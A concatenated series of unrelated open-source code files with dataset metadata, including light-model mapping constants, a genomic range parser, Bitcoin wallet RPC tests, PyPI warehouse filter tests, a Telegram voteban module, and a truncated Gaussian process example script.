MODE_DAILY_FIXED_ENERGY = "daily_fixed_energy"
MODE_LUT = "lut"
MODE_LINEAR = "linear"
MODE_FIXED = "fixed"
MODE_WLED = "wled"
CALCULATION_MODES = [
MODE_DAILY_FIXED_ENERGY,
MODE_FIXED,
MODE_LINEAR,
MODE_LUT,
MODE_WLED,
]
MANUFACTURER_DIRECTORY_MAPPING = {
"IKEA of Sweden": "ikea",
"Feibit Inc co. ": "jiawen",
"LEDVANCE": "ledvance",
"MLI": "mueller-licht",
"OSRAM": "osram",
"Signify Netherlands B.V.": "signify",
"Aqara": "aqara",
}
MANUFACTURER_ALIASES = {
"Philips": "Signify Netherlands B.V.",
"IKEA": "Ikea of Sweden",
"Xiaomi": "Aqara",
"LUMI": "Aqara",
}
MODEL_DIRECTORY_MAPPING = {
"IKEA of Sweden": {
"TRADFRI bulb E14 WS opal 400lm": "LED1536G5",
"TRADFRI bulb GU10 WS 400lm": "LED1537R6",
"TRADFRI bulb E27 WS opal 980lm": "LED1545G12",
"TRADFRI bulb E27 WS clear 950lm": "LED1546G12",
"TRADFRI bulb E27 opal 1000lm": "LED1623G12",
"TRADFRI bulb E27 CWS opal 600lm": "LED1624G9",
"TRADFRI bulb E14 W op/ch 400lm": "LED1649C5",
"TRADFRI bulb GU10 W 400lm": "LED1650R5",
"TRADFRI bulb E27 WS opal 1000lm": "LED1732G11",
"TRADFRI bulb E14 WS opal 600lm": "LED1733G7",
"TRADFRI bulb E27 WS clear 806lm": "LED1736G9",
"TRADFRI bulb E14 WS opal 600lm": "LED1738G7",
"TRADFRI bulb E14 WS 470lm": "LED1835C6",
"TRADFRI bulb E27 WW 806lm": "LED1836G9",
"TRADFRI bulb E27 WW clear 250lm": "LED1842G3",
"TRADFRI bulb GU10 WW 400lm": "LED1837R5",
"TRADFRIbulbE14WSglobeopal470lm": "LED2002G5",
"LEPTITER Recessed spot light": "T1820",
},
"Signify Netherlands B.V.": {
"440400982841": "LCT024",
"8718696449691": "LWB010",
"3417711P6": "LTW017",
"3418931P6": "LTC012",
"3261030P6": "LTC001",
"3261031P6": "LTC001",
"3261048P6": "LTC001",
},
}
| 31.419355
| 60
| 0.717659
|
b6df24e95eaabe066ddb1c2138e75e986ff553f7
| 2,328
|
py
|
Python
|
skgenome/rangelabel.py
|
jeremy9959/cnvkit
|
b839a2b323113a7d318d216f61a0ed6657c70ed4
|
[
"Apache-2.0"
] | null | null | null |
skgenome/rangelabel.py
|
jeremy9959/cnvkit
|
b839a2b323113a7d318d216f61a0ed6657c70ed4
|
[
"Apache-2.0"
] | null | null | null |
skgenome/rangelabel.py
|
jeremy9959/cnvkit
|
b839a2b323113a7d318d216f61a0ed6657c70ed4
|
[
"Apache-2.0"
] | null | null | null |
"""Handle text genomic ranges as named tuples.
A range specification should look like ``chromosome:start-end``, e.g.
``chr1:1234-5678``, with 1-indexed integer coordinates. We also allow
``chr1:1234-`` or ``chr1:-5678``, where missing start becomes 0 and missing end
becomes None.
"""
from __future__ import absolute_import, division, print_function
from past.builtins import basestring
import collections
import re
Region = collections.namedtuple('Region', 'chromosome start end')
NamedRegion = collections.namedtuple('NamedRegion', 'chromosome start end gene')
re_label = re.compile(r'(\w+)?:(\d+)?-(\d+)?\s*(\S+)?')
def from_label(text, keep_gene=True):
"""Parse a chromosomal range specification.
Parameters
----------
text : string
Range specification, which should look like ``chr1:1234-5678`` or
``chr1:1234-`` or ``chr1:-5678``, where missing start becomes 0 and
missing end becomes None.
"""
match = re_label.match(text)
if match:
chrom, start, end, gene = match.groups()
start = int(start) - 1 if start else None
end = int(end) if end else None
if keep_gene:
gene = gene or ''
return NamedRegion(chrom, start, end, gene)
else:
return Region(chrom, start, end)
else:
raise ValueError("Invalid range spec: " + text
+ " (should be like: chr1:2333000-2444000)")
def to_label(row):
"""Convert a Region or (chrom, start, end) tuple to a region label."""
return "{}:{}-{}".format(row.chromosome, row.start + 1, row.end)
def unpack_range(a_range):
"""Extract chromosome, start, end from a string or tuple.
Examples::
"chr1" -> ("chr1", None, None)
"chr1:100-123" -> ("chr1", 99, 123)
("chr1", 100, 123) -> ("chr1", 100, 123)
"""
if not a_range:
return Region(None, None, None)
if isinstance(a_range, basestring):
if ':' in a_range and '-' in a_range:
return from_label(a_range, keep_gene=False)
return Region(a_range, None, None)
if isinstance(a_range, (list, tuple)):
if len(a_range) == 3:
return Region(*a_range)
elif len(a_range) == 4:
return Region(*a_range[:3])
raise ValueError("Not a range: %r" % a_range)
| 33.257143
| 80
| 0.616409
|
75d1297dc218895001206f58719403f4321c8ae6
| 1,331
|
py
|
Python
|
pystiche/papers/gatys_ecker_bethge_2015/utils.py
|
jbueltemeier/pystiche
|
0d0707121e63c4355303446e62a4894e86a7b763
|
[
"BSD-3-Clause"
] | null | null | null |
pystiche/papers/gatys_ecker_bethge_2015/utils.py
|
jbueltemeier/pystiche
|
0d0707121e63c4355303446e62a4894e86a7b763
|
[
"BSD-3-Clause"
] | null | null | null |
pystiche/papers/gatys_ecker_bethge_2015/utils.py
|
jbueltemeier/pystiche
|
0d0707121e63c4355303446e62a4894e86a7b763
|
[
"BSD-3-Clause"
] | null | null | null |
import torch
from torch import nn, optim
from torch.optim.optimizer import Optimizer
import pystiche
from pystiche.enc import MultiLayerEncoder, vgg19_multi_layer_encoder
from pystiche.image import CaffePostprocessing, CaffePreprocessing
__all__ = [
"gatys_ecker_bethge_2015_preprocessor",
"gatys_ecker_bethge_2015_postprocessor",
"gatys_ecker_bethge_2015_optimizer",
"gatys_ecker_bethge_2015_multi_layer_encoder",
]
def gatys_ecker_bethge_2015_preprocessor() -> nn.Module:
return CaffePreprocessing()
def gatys_ecker_bethge_2015_postprocessor() -> nn.Module:
return CaffePostprocessing()
def gatys_ecker_bethge_2015_multi_layer_encoder(
impl_params: bool = True,
) -> MultiLayerEncoder:
multi_layer_encoder = vgg19_multi_layer_encoder(
weights="caffe", preprocessing=False, allow_inplace=True
)
if impl_params:
return multi_layer_encoder
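    # Paper-faithful variant (impl_params=False): swap each MaxPool2d for an
    # AvgPool2d with matching pooling parameters, since Gatys, Ecker & Bethge
    # (2015) use average pooling in place of max pooling.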
for name, module in multi_layer_encoder.named_children():
if isinstance(module, nn.MaxPool2d):
multi_layer_encoder._modules[name] = nn.AvgPool2d(
**pystiche.pool_module_meta(module)
)
return multi_layer_encoder
def gatys_ecker_bethge_2015_optimizer(input_image: torch.Tensor) -> Optimizer:
return optim.LBFGS([input_image.requires_grad_(True)], lr=1.0, max_iter=1)
| 30.25
| 78
| 0.764838
|
33e918040726dff7342fb8a041d7d911842d41f8
| 577
|
py
|
Python
|
controleur/actionsCases/ActionsCasesUnJoueur.py
|
JordanSamhi/BricksBreaker
|
e2efb28e5ec43056e9665479920523576c692a6b
|
[
"MIT"
] | null | null | null |
controleur/actionsCases/ActionsCasesUnJoueur.py
|
JordanSamhi/BricksBreaker
|
e2efb28e5ec43056e9665479920523576c692a6b
|
[
"MIT"
] | null | null | null |
controleur/actionsCases/ActionsCasesUnJoueur.py
|
JordanSamhi/BricksBreaker
|
e2efb28e5ec43056e9665479920523576c692a6b
|
[
"MIT"
] | null | null | null |
from controleur.actionsCases.ActionsCases import ActionCases
class ActionsCasesUnJoueur(ActionCases):
def __init__(self, mode, app):
ActionCases.__init__(self, mode, app)
def detruireCases(self):
if len(self._semblables) >= self.LIMITE_NOMBRE_CASES and not self.semblablesSontDetruits():
for case in self._semblables:
case.detruire()
self._mode.getJoueur().ajouterScore(len(self._semblables))
self.gravite()
def update(self):
self._application.update()
| 38.466667
| 100
| 0.637782
|
1e705887dc3d45232139301b9f3b04e044df1279
| 10,475
|
py
|
Python
|
test/functional/listtransactions.py
|
aixinwang/Gfc
|
4a7fdac234f5f51055e471e77aaff62cfa4c6eab
|
[
"MIT"
] | null | null | null |
test/functional/listtransactions.py
|
aixinwang/Gfc
|
4a7fdac234f5f51055e471e77aaff62cfa4c6eab
|
[
"MIT"
] | null | null | null |
test/functional/listtransactions.py
|
aixinwang/Gfc
|
4a7fdac234f5f51055e471e77aaff62cfa4c6eab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The GFC coin bt developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the listtransactions API."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, COIN
from io import BytesIO
def txFromHex(hexstring):
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(hexstring))
tx.deserialize(f)
return tx
class ListTransactionsTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def setup_nodes(self):
#This test requires mocktime
self.enable_mocktime()
self.nodes = self.start_nodes(self.num_nodes, self.options.tmpdir)
def run_test(self):
# Simple send, 0 to 1:
txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
self.sync_all()
assert_array_result(self.nodes[0].listtransactions(),
{"txid":txid},
{"category":"send","account":"","amount":Decimal("-0.1"),"confirmations":0})
assert_array_result(self.nodes[1].listtransactions(),
{"txid":txid},
{"category":"receive","account":"","amount":Decimal("0.1"),"confirmations":0})
# mine a block, confirmations should change:
self.nodes[0].generate(1)
self.sync_all()
assert_array_result(self.nodes[0].listtransactions(),
{"txid":txid},
{"category":"send","account":"","amount":Decimal("-0.1"),"confirmations":1})
assert_array_result(self.nodes[1].listtransactions(),
{"txid":txid},
{"category":"receive","account":"","amount":Decimal("0.1"),"confirmations":1})
# send-to-self:
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
assert_array_result(self.nodes[0].listtransactions(),
{"txid":txid, "category":"send"},
{"amount":Decimal("-0.2")})
assert_array_result(self.nodes[0].listtransactions(),
{"txid":txid, "category":"receive"},
{"amount":Decimal("0.2")})
# sendmany from node1: twice to self, twice to node2:
send_to = { self.nodes[0].getnewaddress() : 0.11,
self.nodes[1].getnewaddress() : 0.22,
self.nodes[0].getaccountaddress("from1") : 0.33,
self.nodes[1].getaccountaddress("toself") : 0.44 }
txid = self.nodes[1].sendmany("", send_to)
self.sync_all()
assert_array_result(self.nodes[1].listtransactions(),
{"category":"send","amount":Decimal("-0.11")},
{"txid":txid} )
assert_array_result(self.nodes[0].listtransactions(),
{"category":"receive","amount":Decimal("0.11")},
{"txid":txid} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"send","amount":Decimal("-0.22")},
{"txid":txid} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"receive","amount":Decimal("0.22")},
{"txid":txid} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"send","amount":Decimal("-0.33")},
{"txid":txid} )
assert_array_result(self.nodes[0].listtransactions(),
{"category":"receive","amount":Decimal("0.33")},
{"txid":txid, "account" : "from1"} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"send","amount":Decimal("-0.44")},
{"txid":txid, "account" : ""} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"receive","amount":Decimal("0.44")},
{"txid":txid, "account" : "toself"} )
multisig = self.nodes[1].createmultisig(1, [self.nodes[1].getnewaddress()])
self.nodes[0].importaddress(multisig["redeemScript"], "watchonly", False, True)
txid = self.nodes[1].sendtoaddress(multisig["address"], 0.1)
self.nodes[1].generate(1)
self.sync_all()
assert(len(self.nodes[0].listtransactions("watchonly", 100, 0, False)) == 0)
assert_array_result(self.nodes[0].listtransactions("watchonly", 100, 0, True),
{"category":"receive","amount":Decimal("0.1")},
{"txid":txid, "account" : "watchonly"} )
self.run_rbf_opt_in_test()
# Check that the opt-in-rbf flag works properly, for sent and received
# transactions.
def run_rbf_opt_in_test(self):
# Check whether a transaction signals opt-in RBF itself
def is_opt_in(node, txid):
rawtx = node.getrawtransaction(txid, 1)
for x in rawtx["vin"]:
if x["sequence"] < 0xfffffffe:
return True
return False
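        # (Per BIP125, a transaction explicitly signals replaceability when any of its
        # inputs has nSequence < 0xfffffffe; unconfirmed descendants of a signaling
        # transaction are reported as replaceable as well.)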
# Find an unconfirmed output matching a certain txid
def get_unconfirmed_utxo_entry(node, txid_to_match):
utxo = node.listunspent(0, 0)
for i in utxo:
if i["txid"] == txid_to_match:
return i
return None
# 1. Chain a few transactions that don't opt-in.
txid_1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1)
assert(not is_opt_in(self.nodes[0], txid_1))
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_1}, {"bip125-replaceable":"no"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_1}, {"bip125-replaceable":"no"})
# Tx2 will build off txid_1, still not opting in to RBF.
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[0], txid_1)
assert_equal(utxo_to_use["safe"], True)
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[1], txid_1)
assert_equal(utxo_to_use["safe"], False)
# Create tx2 using createrawtransaction
inputs = [{"txid":utxo_to_use["txid"], "vout":utxo_to_use["vout"]}]
outputs = {self.nodes[0].getnewaddress(): 0.999}
tx2 = self.nodes[1].createrawtransaction(inputs, outputs)
tx2_signed = self.nodes[1].signrawtransaction(tx2)["hex"]
txid_2 = self.nodes[1].sendrawtransaction(tx2_signed)
# ...and check the result
assert(not is_opt_in(self.nodes[1], txid_2))
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_2}, {"bip125-replaceable":"no"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_2}, {"bip125-replaceable":"no"})
# Tx3 will opt-in to RBF
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[0], txid_2)
inputs = [{"txid": txid_2, "vout":utxo_to_use["vout"]}]
outputs = {self.nodes[1].getnewaddress(): 0.998}
tx3 = self.nodes[0].createrawtransaction(inputs, outputs)
tx3_modified = txFromHex(tx3)
tx3_modified.vin[0].nSequence = 0
tx3 = bytes_to_hex_str(tx3_modified.serialize())
tx3_signed = self.nodes[0].signrawtransaction(tx3)['hex']
txid_3 = self.nodes[0].sendrawtransaction(tx3_signed)
assert(is_opt_in(self.nodes[0], txid_3))
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_3}, {"bip125-replaceable":"yes"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_3}, {"bip125-replaceable":"yes"})
# Tx4 will chain off tx3. Doesn't signal itself, but depends on one
# that does.
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[1], txid_3)
inputs = [{"txid": txid_3, "vout":utxo_to_use["vout"]}]
outputs = {self.nodes[0].getnewaddress(): 0.997}
tx4 = self.nodes[1].createrawtransaction(inputs, outputs)
tx4_signed = self.nodes[1].signrawtransaction(tx4)["hex"]
txid_4 = self.nodes[1].sendrawtransaction(tx4_signed)
assert(not is_opt_in(self.nodes[1], txid_4))
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_4}, {"bip125-replaceable":"yes"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_4}, {"bip125-replaceable":"yes"})
# Replace tx3, and check that tx4 becomes unknown
tx3_b = tx3_modified
tx3_b.vout[0].nValue -= int(Decimal("0.004") * COIN) # bump the fee
tx3_b = bytes_to_hex_str(tx3_b.serialize())
tx3_b_signed = self.nodes[0].signrawtransaction(tx3_b)['hex']
txid_3b = self.nodes[0].sendrawtransaction(tx3_b_signed, True)
assert(is_opt_in(self.nodes[0], txid_3b))
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_4}, {"bip125-replaceable":"unknown"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_4}, {"bip125-replaceable":"unknown"})
# Check gettransaction as well:
for n in self.nodes[0:2]:
assert_equal(n.gettransaction(txid_1)["bip125-replaceable"], "no")
assert_equal(n.gettransaction(txid_2)["bip125-replaceable"], "no")
assert_equal(n.gettransaction(txid_3)["bip125-replaceable"], "yes")
assert_equal(n.gettransaction(txid_3b)["bip125-replaceable"], "yes")
assert_equal(n.gettransaction(txid_4)["bip125-replaceable"], "unknown")
# After mining a transaction, it's no longer BIP125-replaceable
self.nodes[0].generate(1)
assert(txid_3b not in self.nodes[0].getrawmempool())
assert_equal(self.nodes[0].gettransaction(txid_3b)["bip125-replaceable"], "no")
assert_equal(self.nodes[0].gettransaction(txid_4)["bip125-replaceable"], "unknown")
if __name__ == '__main__':
ListTransactionsTest().main()
| 50.360577 | 113 | 0.600764 |
c6f1fc9e1937519053a4eb16de238db84bda6e70 | 5,946 | py | Python | tests/unit/test_filters.py | Dithn/warehouse | 953b77ecfc7dade203db423307539ea9d6115657 | ["Apache-2.0"] | 2 | 2021-10-11T21:52:57.000Z | 2021-11-17T10:29:15.000Z | tests/unit/test_filters.py | Dithn/warehouse | 953b77ecfc7dade203db423307539ea9d6115657 | ["Apache-2.0"] | 85 | 2022-02-14T04:38:24.000Z | 2022-03-31T04:42:30.000Z | tests/unit/test_filters.py | Dithn/warehouse | 953b77ecfc7dade203db423307539ea9d6115657 | ["Apache-2.0"] | 1 | 2020-12-01T21:12:24.000Z | 2020-12-01T21:12:24.000Z |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import urllib.parse
from functools import partial
import packaging.version
import pretend
import pytest
from warehouse import filters
def test_camo_url():
request = pretend.stub(
registry=pretend.stub(
settings={"camo.url": "https://camo.example.net/", "camo.key": "fake key"}
)
)
c_url = filters._camo_url(request, "http://example.com/image.jpg")
assert c_url == (
"https://camo.example.net/b410d235a3d2fc44b50ccab827e531dece213062/"
"687474703a2f2f6578616d706c652e636f6d2f696d6167652e6a7067"
)
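    # (The expected value above is the camo base URL, a hex keyed digest of the target URL
    # computed with the configured "camo.key", then the target URL itself hex-encoded:
    # "68747470..." decodes to "http://example.com/image.jpg".)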
class TestCamoify:
def test_camoify(self):
html = "<img src=http://example.com/image.jpg>"
request = pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
}
)
)
camo_url = partial(filters._camo_url, request)
request.camo_url = camo_url
ctx = {"request": request}
result = filters.camoify(ctx, html)
assert result == (
'<img src="https://camo.example.net/'
"b410d235a3d2fc44b50ccab827e531dece213062/"
'687474703a2f2f6578616d706c652e636f6d2f696d6167652e6a7067">'
)
def test_camoify_no_src(self, monkeypatch):
html = "<img>"
request = pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
}
)
)
camo_url = partial(filters._camo_url, request)
request.camo_url = camo_url
ctx = {"request": request}
gen_camo_url = pretend.call_recorder(
lambda curl, ckey, url: "https://camo.example.net/image.jpg"
)
monkeypatch.setattr(filters, "_camo_url", gen_camo_url)
result = filters.camoify(ctx, html)
assert result == "<img>"
assert gen_camo_url.calls == []
@pytest.mark.parametrize(
("inp", "expected"),
[
(1, "1"),
(999, "999"),
(1234, "1.23k"),
(4304264, "4.3M"),
(7878123132, "7.88G"),
(9999999999999, "10T"),
],
)
def test_shorten_number(inp, expected):
assert filters.shorten_number(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[({"foo": "bar", "left": "right"}, '{"foo":"bar","left":"right"}')],
)
def test_tojson(inp, expected):
assert filters.tojson(inp) == expected
def test_urlparse():
inp = "https://google.com/foo/bar?a=b"
expected = urllib.parse.urlparse(inp)
assert filters.urlparse(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
"'python', finance, \"data\", code , test automation",
["python", "finance", "data", "code", "test automation"],
),
(
"'python'; finance; \"data\"; code ; test automation",
["python", "finance", "data", "code", "test automation"],
),
("a \"b\" c d 'e'", ["a", "b", "c", "d", "e"]),
(" ' ' \" \"", []),
],
)
def test_format_tags(inp, expected):
assert filters.format_tags(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
["Foo :: Bar :: Baz", "Foo :: Bar :: Qux", "Vleep"],
[("Foo", ["Bar :: Baz", "Bar :: Qux"])],
),
(
["Vleep :: Foo", "Foo :: Bar :: Qux", "Foo :: Bar :: Baz"],
[("Foo", ["Bar :: Baz", "Bar :: Qux"]), ("Vleep", ["Foo"])],
),
],
)
def test_format_classifiers(inp, expected):
assert list(filters.format_classifiers(inp).items()) == expected
@pytest.mark.parametrize(
("inp", "expected"), [("Foo", "Foo"), ("Foo :: Foo", "Foo_._Foo")]
)
def test_classifier_id(inp, expected):
assert filters.classifier_id(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(["abcdef", "ghijkl"], False),
(["https://github.com/example/test", "https://pypi.io/"], True),
(["abcdef", "https://github.com/example/test"], True),
],
)
def test_contains_valid_uris(inp, expected):
assert filters.contains_valid_uris(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
("bdist_dmg", "OSX Disk Image"),
("bdist_dumb", "Dumb Binary"),
("bdist_egg", "Egg"),
("bdist_msi", "Windows MSI Installer"),
("bdist_rpm", "RPM"),
("bdist_wheel", "Wheel"),
("bdist_wininst", "Windows Installer"),
("sdist", "Source"),
("invalid", "invalid"),
],
)
def test_format_package_type(inp, expected):
assert filters.format_package_type(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"), [("1.0", packaging.version.Version("1.0"))]
)
def test_parse_version(inp, expected):
assert filters.parse_version(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
datetime.datetime(2018, 12, 26, 13, 36, 5, 789013),
"2018-12-26 13:36:05.789013 UTC",
)
],
)
def test_localize_datetime(inp, expected):
datetime_format = "%Y-%m-%d %H:%M:%S.%f %Z"
assert filters.localize_datetime(inp).strftime(datetime_format) == expected
| 28.180095 | 86 | 0.568954 |
c1147746aa6d8e6306419e65f58906a35e32e752 | 785 | py | Python | modules/voteban/consts.py | Kylmakalle/assistant-bot | 71c0f488a3dfb370ef2a87bbba83862b061c772a | ["MIT"] | 4 | 2020-02-05T14:05:08.000Z | 2021-09-12T17:43:04.000Z | modules/voteban/consts.py | Kylmakalle/assistant-bot | 71c0f488a3dfb370ef2a87bbba83862b061c772a | ["MIT"] | 6 | 2019-03-20T07:42:26.000Z | 2022-01-06T17:56:47.000Z | modules/voteban/consts.py | Kylmakalle/assistant-bot | 71c0f488a3dfb370ef2a87bbba83862b061c772a | ["MIT"] | 5 | 2019-06-22T06:32:41.000Z | 2022-01-02T16:10:51.000Z |
from aiogram.utils.callback_data import CallbackData
import random
voter = CallbackData('voter', 'chat_id', 'user_id')
from modules.captcha_button.consts import LogEvents
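# Extend the shared captcha_button LogEvents with voteban-specific events; reusing the
# class name shadows the imported LogEvents within this module.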
class LogEvents(LogEvents):
UNMEDIA = 'unmedia'
VOTEBAN = 'voteban'
BAN = 'BAN'
TEMPBAN = 'TEMPBAN'
KICK = 'KICK'
ADMIN_REPORT_RESPONSES = [
    'Маленький шаг в сторону бана, анимешник.',  # "A small step toward a ban, anime fan."
    'Так-так, что тут у нас? Образованный, революционер...',  # "Well, well, what do we have here? Educated, a revolutionary..."
    'Telegram не любит амдшников.',  # "Telegram doesn't like AMD fans."
    'План по репортам за день выполнен, пора банить.',  # "The daily report quota is met, time to ban."
    'Пойди это Петровичу расскажи.',  # "Go tell that to Petrovich."
    'Вот ты и попался, анимешник!',  # "Now you're caught, anime fan!"
    'Вскрывайся, амудешник!',  # "Own up, AMD fan!"
    'Заслуженный бан за свиней!',  # "A well-deserved ban for the pigs!"
'W A S T E D'
]
def get_admin_report_response():
return random.sample(ADMIN_REPORT_RESPONSES, 1)[0]
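    # (Equivalent to random.choice(ADMIN_REPORT_RESPONSES); the strings above are the
    # bot's canned replies to admin reports.)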
| 24.53125 | 60 | 0.689172 |
81e3b02ed34e17640e60f38b1f16c4743b8de174 | 408 | py | Python | astoria/consumers/astctl/usercode/__init__.py | sedders123/astoria | d1e9603b10d765aed4c1237e79b5ab48a9af1d83 | ["MIT"] | 1 | 2021-02-03T02:54:54.000Z | 2021-02-03T02:54:54.000Z | astoria/consumers/astctl/usercode/__init__.py | sedders123/astoria | d1e9603b10d765aed4c1237e79b5ab48a9af1d83 | ["MIT"] | 72 | 2020-12-15T18:29:18.000Z | 2022-03-08T09:42:53.000Z | astoria/astctl/usercode/__init__.py | trickeydan/astoria | ef08ed4be4d5997751846b0cadce9aa8261ae151 | ["MIT"] | 2 | 2022-02-05T23:00:51.000Z | 2022-03-09T21:40:49.000Z |
"""Commands to interact with usercode."""
import click
from .kill import kill
from .log import log
from .restart import restart
from .show import show
from .trigger import trigger
@click.group("usercode")
def usercode() -> None:
"""Interact with Usercode."""
usercode.add_command(kill)
usercode.add_command(log)
usercode.add_command(restart)
usercode.add_command(show)
usercode.add_command(trigger)
| 19.428571 | 41 | 0.769608 |
a77057856425bd6bf62713853236f5dbe0558c67 | 418 | py | Python | tests/test_beholder.py | mickevi/beholder | b6ca4cbecca1540d65a62fd7d2ae8c86412ae88d | ["0BSD"] | null | null | null | tests/test_beholder.py | mickevi/beholder | b6ca4cbecca1540d65a62fd7d2ae8c86412ae88d | ["0BSD"] | null | null | null | tests/test_beholder.py | mickevi/beholder | b6ca4cbecca1540d65a62fd7d2ae8c86412ae88d | ["0BSD"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_beholder
----------------------------------
Tests for `beholder` module.
"""
import unittest
from beholder import beholder
class TestBeholder(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_000_something(self):
pass
if __name__ == '__main__':
import sys
sys.exit(unittest.main())
| 13.483871 | 38 | 0.58134 |
57a22ac01f3dcabedf7a4d50e4f3c04be8df3f1b | 39 | py | Python | blog/__init__.py | EvaZogg/DjangoTranslationWebsite | 3946c052547deed216332cb316f48fc70c09ff22 | ["BSD-2-Clause"] | null | null | null | blog/__init__.py | EvaZogg/DjangoTranslationWebsite | 3946c052547deed216332cb316f48fc70c09ff22 | ["BSD-2-Clause"] | null | null | null | blog/__init__.py | EvaZogg/DjangoTranslationWebsite | 3946c052547deed216332cb316f48fc70c09ff22 | ["BSD-2-Clause"] | null | null | null |
def blog_view(request):
return None
| 19.5 | 23 | 0.74359 |
2fb85a9bc16cdfc1624ed7d0262a4bb36446266f | 1,232 | py | Python | tensorflow_toolkit/image_retrieval/image_retrieval/frames_provider.py | morkovka1337/openvino_training_extensions | 846db45c264d6b061505213f51763520b9432ba9 | ["Apache-2.0"] | 256 | 2020-09-09T03:27:57.000Z | 2022-03-30T10:06:06.000Z | tensorflow_toolkit/image_retrieval/image_retrieval/frames_provider.py | morkovka1337/openvino_training_extensions | 846db45c264d6b061505213f51763520b9432ba9 | ["Apache-2.0"] | 604 | 2020-09-08T12:29:49.000Z | 2022-03-31T21:51:08.000Z | tensorflow_toolkit/image_retrieval/image_retrieval/frames_provider.py | morkovka1337/openvino_training_extensions | 846db45c264d6b061505213f51763520b9432ba9 | ["Apache-2.0"] | 160 | 2020-09-09T14:06:07.000Z | 2022-03-30T14:50:48.000Z |
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import cv2
class FramesProvider:
def __init__(self, images_list_path):
self.impaths = []
self.probe_classes = []
with open(images_list_path) as f:
content = [line.strip().split() for line in f.readlines() if line.strip()]
root = os.path.dirname(images_list_path)
for impath, label in content:
self.impaths.append(os.path.join(root, impath))
self.probe_classes.append(int(label))
def __iter__(self):
for impath, probe_class in zip(self.impaths, self.probe_classes):
image = cv2.imread(impath)
yield image, probe_class
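# A minimal usage sketch (paths are hypothetical): each line of the list file is
# "<image path relative to the list file> <integer label>", and iterating the provider
# yields (BGR image array as returned by cv2.imread, int label) pairs.
# provider = FramesProvider("gallery/images_list.txt")
# for image, probe_class in provider:
#     ...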
| 30.8 | 86 | 0.691558 |
6c848c6c86c3c2dcc68bd1365293553e5b2aeb40 | 1,837 | py | Python | examples/ex/ex_sim.py | tonyduan/gp-lib | 8febaab91cad8b6435791fa5f0673b0c033c0101 | ["MIT"] | 4 | 2019-05-02T21:31:48.000Z | 2021-10-03T03:23:46.000Z | examples/ex/ex_sim.py | tonyduan/gaussian-processes | 8febaab91cad8b6435791fa5f0673b0c033c0101 | ["MIT"] | null | null | null | examples/ex/ex_sim.py | tonyduan/gaussian-processes | 8febaab91cad8b6435791fa5f0673b0c033c0101 | ["MIT"] | 1 | 2021-10-03T03:23:53.000Z | 2021-10-03T03:23:53.000Z |
import numpy as np
from argparse import ArgumentParser
from sklearn.datasets import load_breast_cancer, load_iris, load_boston, load_wine
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score, roc_auc_score
from gp_lib.gp import ConstantMeanGP
from gp_lib.kernels import *
if __name__ == "__main__":
np.random.seed(123)
argparser = ArgumentParser()
argparser.add_argument("--lr", type=float, default=1.0)
argparser.add_argument("--r2", type=float, default=0.75)
argparser.add_argument("--tol", type=float, default=1e-3)
argparser.add_argument("--m", type=int, default=1000)
argparser.add_argument("--n", type=int, default=100)
argparser.add_argument("--verbose", action="store_true")
args = argparser.parse_args()
x = np.random.randn(args.m, args.n)
x = np.c_[x, np.ones(args.m)]
theta = np.random.randn(args.n + 1)
